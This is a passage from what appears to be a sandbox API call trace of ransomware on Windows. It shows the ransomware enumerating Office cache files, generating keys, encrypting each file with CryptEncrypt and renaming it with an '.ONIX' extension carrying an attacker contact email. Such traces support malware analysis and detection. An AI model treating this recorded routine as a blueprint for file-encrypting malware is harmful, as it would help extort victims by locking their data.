(in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0102.895] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0102.895] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0102.895] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0102.895] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.896] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x43e3f8 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458858 | out: hHeap=0x410000) returned 1 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f680 | out: hHeap=0x410000) returned 1 [0102.896] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ebb0 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.896] GetLastError () returned 0x0 [0102.896] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.896] GetLastError () returned 0x0 [0102.896] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0102.896] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0102.896] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0102.896] GetLastError () returned 0x0 [0102.897] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x200 [0102.897] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0102.898] LockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3e7e1f, nNumberOfBytesToLockHigh=0x0) returned 1 [0102.898] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.898] ReadFile (in: hFile=0x200, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0102.902] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.902] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0102.902] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0102.902] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0102.902] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", dwFileAttributes=0x80) returned 1 [0102.903] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 76 [0102.903] GetProcessHeap () returned 0x410000 [0102.903] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0102.903] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" [0102.903] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0102.903] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=4095519) returned 1 [0102.903] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x3e7e1f [0102.903] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0102.903] GetProcessHeap () returned 0x410000 [0102.903] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0102.903] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0102.903] WriteFile (in: hFile=0x200, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0102.906] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0102.906] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0102.907] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3e7e1f) returned 0x3680020 [0102.908] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3e7e1f) returned 0x3a70020 [0102.908] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.908] ReadFile (in: hFile=0x200, lpBuffer=0x3680020, nNumberOfBytesToRead=0x3e7e1f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x3e7e1f, lpOverlapped=0x0) returned 1 [0103.108] UnlockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3e7e1f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.108] CloseHandle (hObject=0x200) returned 1 [0103.110] GetProcessHeap () returned 0x410000 [0103.110] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.110] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.112] GetProcessHeap () returned 0x410000 [0103.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0103.112] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0103.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0103.112] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.112] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0103.112] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.113] GetLastError () returned 0x0 [0103.113] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x200 [0103.113] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.113] LockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x264400, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.113] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.113] ReadFile (in: hFile=0x200, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.115] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.115] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.115] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.115] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.115] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", dwFileAttributes=0x80) returned 1 [0103.115] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 77 [0103.115] GetProcessHeap () returned 0x410000 [0103.115] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a) returned 0x467908 [0103.115] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" [0103.115] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.115] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2507776) returned 1 [0103.116] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x264400 [0103.116] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.116] GetProcessHeap () returned 0x410000 [0103.116] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0103.116] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.116] WriteFile (in: hFile=0x200, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.118] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.119] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.120] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x264400) returned 0x3680020 [0103.129] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x264400) returned 0x38f0020 [0103.129] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.129] ReadFile (in: hFile=0x200, lpBuffer=0x3680020, nNumberOfBytesToRead=0x264400, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x264400, lpOverlapped=0x0) returned 1 [0103.272] UnlockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x264400, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.273] CloseHandle (hObject=0x200) returned 1 [0103.276] GetProcessHeap () returned 0x410000 [0103.277] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.277] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.283] GetProcessHeap () returned 0x410000 [0103.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0103.283] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0103.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0103.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.283] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0103.283] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.283] GetLastError () returned 0x0 [0103.283] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x200 [0103.284] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.284] LockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x391, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.284] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.284] ReadFile (in: hFile=0x200, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.286] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.286] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.286] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.286] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.286] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", dwFileAttributes=0x80) returned 1 [0103.287] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 77 [0103.287] GetProcessHeap () returned 0x410000 [0103.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a) returned 0x467908 [0103.287] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" [0103.287] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.287] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=913) returned 1 [0103.287] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x391 [0103.287] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.287] GetProcessHeap () returned 0x410000 [0103.287] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0103.287] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.287] WriteFile (in: hFile=0x200, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.289] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.291] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.292] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x391) returned 0x4d6b68 [0103.292] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x391) returned 0x4d6f08 [0103.292] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.293] ReadFile (in: hFile=0x200, lpBuffer=0x4d6b68, nNumberOfBytesToRead=0x391, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b68*, lpNumberOfBytesRead=0x367f44c*=0x391, lpOverlapped=0x0) returned 1 [0103.293] SetFilePointer (in: hFile=0x200, lDistanceToMove=-913, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.293] WriteFile (in: hFile=0x200, lpBuffer=0x4d6f08*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6f08*, lpNumberOfBytesWritten=0x367f44c*=0x391, lpOverlapped=0x0) returned 1 [0103.294] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b68 | out: hHeap=0x410000) returned 1 [0103.294] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6f08 | out: hHeap=0x410000) returned 1 [0103.294] UnlockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x391, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.294] CloseHandle (hObject=0x200) returned 1 [0103.295] GetProcessHeap () returned 0x410000 [0103.295] HeapFree (in: hHeap=0x410000, dwFlags=0x0, 